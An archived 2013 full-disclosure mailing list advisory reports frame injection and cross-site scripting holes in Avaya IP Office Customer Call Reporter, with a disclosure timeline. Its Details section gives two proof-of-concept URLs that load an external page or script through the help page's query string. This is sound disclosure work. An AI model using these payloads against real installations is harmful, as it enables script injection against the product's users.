[<prev] [next>] [day] [month] [year] [list]
Message-ID: <010101ce9eb0$52c3a7f0$9b7a6fd5@pc>
Date: Wed, 21 Aug 2013 23:51:37 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
"1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: Vulnerabilities in Avaya IP Office Customer Call
Reporter
Hello list!
I want to warn you about vulnerabilities in Avaya IP Office Customer Call
Reporter. These are Remote HTML Include and Remote XSS Include (Cross-Site
Scripting) vulnerabilities.
After I found multiple vulnerabilities in Avaya IP Office Customer Call
Reporter in December, I informed ZDI about them (critical ones). ZDI was
very slow in processing these holes (regardless of my remindings) and only
at 30th of July they begun actively working with them. I wrote about this
case with ZDI in WASC Mailing List
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008883.html).
When Avaya ignored my informing in July and ZDI stopped working on this case
in August (since Avaya was not responding to them also), I published these
two vulnerabilities (the least critical). There are many other
vulnerabilities, including critical holes which allow to take control over
admin panel, so Avaya still has a chance to get details of vulnerabilities
in their product before public disclosure.
-------------------------
Affected products:
-------------------------
Vulnerable are Avaya IP Office Customer Call Reporter 8.0.9.13 (tested in
December 2012) and 9.0.0.0 (tested recently) and previous versions.
-------------------------
Affected vendors:
-------------------------
Avaya Inc.
http://www.avaya.com
----------
Details:
----------
Remote HTML Include (Frame Injection) (WASC-12):
http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua
Remote XSS Include (Cross-Site Scripting) (WASC-08):
http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua/webtools/xss_r2.html
------------
Timeline:
------------
2012.12.06 - found multiple vulnerabilities (these ones and other critical
holes).
2012.12.13 - informed ZDI about other critical vulnerabilities.
2012.12.18 - again informed ZDI about other critical vulnerabilities.
2013.01.27 - registered at zerodayinitiative.com and informed them through
the site. ZDI started working on the case.
2013.07.28 - informed Avaya (via two contact forms) about these holes and
other critical vulnerabilities, due to slowness of ZDI.
2013.07.29 - wrote about ZDI in WASC Mailing List.
2013.07.30 - if earlier ZDI only pretended they work on the case, then this
time they started working actively on it (and tried to contact Avaya).
2013.08.07 - ZDI stopped working on the case and closed it, since Avaya was
not responding.
2013.08.20 - disclosed at my site (http://websecurity.com.ua/6717/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists